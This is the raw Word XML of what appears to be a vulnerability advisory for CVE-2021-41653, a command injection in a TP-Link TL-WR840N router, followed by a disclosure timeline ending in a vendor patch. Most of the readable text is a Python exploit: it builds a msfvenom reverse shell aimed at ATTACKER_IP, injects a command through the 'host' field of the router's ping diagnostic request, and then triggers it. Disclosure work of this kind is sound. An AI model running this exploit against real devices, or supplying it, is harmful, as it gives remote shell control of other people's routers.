      </w:r>
    </w:p>
    <w:p w14:paraId="363AD9D2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0AC32B07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def _prepare(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5667EF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print("Generating reverse shell.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DE251A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command = "msfvenom -p linux/mipsle/shell/reverse_tcp -f elf LHOST=" + ATTACKER_IP + " LPORT=2000 -o " + PATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4211DC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os.system(command)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B426B2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413D6B95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def _send_ping_command(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5502B3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URL = self.URL + '?2'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1455897C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data = '[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\r\n'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308828A6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data += 'dataBlockSize=64\r\n'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728C3088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data += 'timeout=1\r\n'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072ED582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data += 'numberOfRepetitions=4\r\n'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC198B2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data += 'host=' + self.command + '\r\n'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600BAE8B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data += 'X_TP_ConnName=ewan_ipoe_d\r\n'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B33E815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data += 'diagnosticsState=Requested\r\n'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515B4272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r = self.session.post(URL, headers=self.headers, data=data, cookies=self.cookies, proxies=self.proxies)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351100EE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685D8B6A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def _send_execute_command(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BA635B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URL = self.URL + '?7'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748291F1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data = '[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5025BC5E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r = self.session.post(URL, headers=self.headers, data=data, cookies=self.cookies, proxies=self.proxies)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B838B1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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0063B047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def execute(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6E3C55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self._prepare()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0D46A0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self._send_ping_command()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5B1D63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    self._send_execute_command()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5183558A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367566F3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>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FB4D9F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e = Exploit(USERNAME, PASSWORD, COMMAND)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DDA254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  <w:r w:rsidRPr="002272CE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  <w:t xml:space="preserve">    e.execute()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A95AFC" w14:textId="77777777" w:rsidR="002272CE" w:rsidRPr="002272CE" w:rsidRDefault="002272CE" w:rsidP="002272C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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14147A06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272CE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Video </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7099F10C" w14:textId="77777777" w:rsidR="002272CE" w:rsidRPr="002272CE" w:rsidRDefault="002272CE" w:rsidP="002272CE">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="EAECEF"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="240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2272C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Disclosure Timeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC15464" w14:textId="77777777" w:rsidR="002272CE" w:rsidRPr="002272CE" w:rsidRDefault="002272CE" w:rsidP="002272CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1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2021.09.20. – TP-Link Security team informed about the vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCF640E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2021.09.22. – TP-Link Security sent response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523E6439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2021.09.22. – Technical details sent to TP-Link Security Team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E97B15A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2021.09.25. – V6.20 device (latest firmware) is not vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7BB0F2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2021.09.25. – Report updated. TP-Link Security Team informed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1040194C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2021.09.26. – TP-Link Security Team replied. Analysis on going.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061722DF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lastRenderedPageBreak/>
        <w:t>2021.11.01. – TP-Link prepared two Beta firmware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A18992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2021.11.01. – The issue fixed in the Beta firmware. (k4m1ll0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10278799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2021.11.03. - CVE-2021-41653 assigned (MITRE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5789BF17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2021.11.12. – TP-Link released the patch "TL-WR840N(EU)_V5_211109"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A74AC45" w14:textId="77777777" w:rsidR="002272CE" w:rsidRPr="002272CE" w:rsidRDefault="002272CE" w:rsidP="002272CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002272CE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>2021.11.12. – Advisory published (k4m1ll0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0168B0" w14:textId="77777777" w:rsidR="002272CE" w:rsidRDefault="002272CE"/>
    <w:sectPr w:rsidR="002272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5F6286"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0512E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67381C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B5503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9E57FC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="722C9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5142D2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="48D47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2CE"/>
    <w:rsid w:val="00227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0BB748"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{280EFBF4-5C31-CA48-9F0C-A966AFFCE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272CE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272C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72C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272C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272C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272CE"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="002272C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272C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72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72C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272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7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vd.nist.gov/vuln/detail/CVE-2020-36178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nvd.nist.gov/vuln/detail/CVE-2019-1506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1424</Words>
  <Characters>8119</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>67</Lines>
  <Paragraphs>19</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>9524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mtx tianxia</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>mtx tianxia</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-01T08:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-01T08:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>